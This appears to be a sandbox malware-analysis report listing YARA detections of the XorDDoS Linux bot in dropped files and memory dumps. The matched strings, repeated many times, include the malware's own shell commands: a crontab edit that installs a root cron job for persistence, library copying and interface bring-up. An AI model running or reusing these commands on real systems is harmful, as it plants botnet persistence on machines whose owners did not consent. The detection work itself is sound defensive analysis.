/usr/bin/uijxdyxaco	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/ypclxoxcxk	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ypclxoxcxk	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ypclxoxcxk	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
Click to see the 36 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6459.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6391.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6303.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6303.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6479.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6479.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6515.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6515.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6498.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6498.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6413.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6413.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6233.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6233.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6520.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6441.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6450.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6450.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6530.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6289.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6289.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6551.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6551.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6541.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6541.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6283.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6396.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6396.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6407.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6407.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6452.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6501.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6501.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6230.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6230.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6424.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6506.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6263.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6482.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6482.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6324.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6324.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6321.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6321.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6372.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6266.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
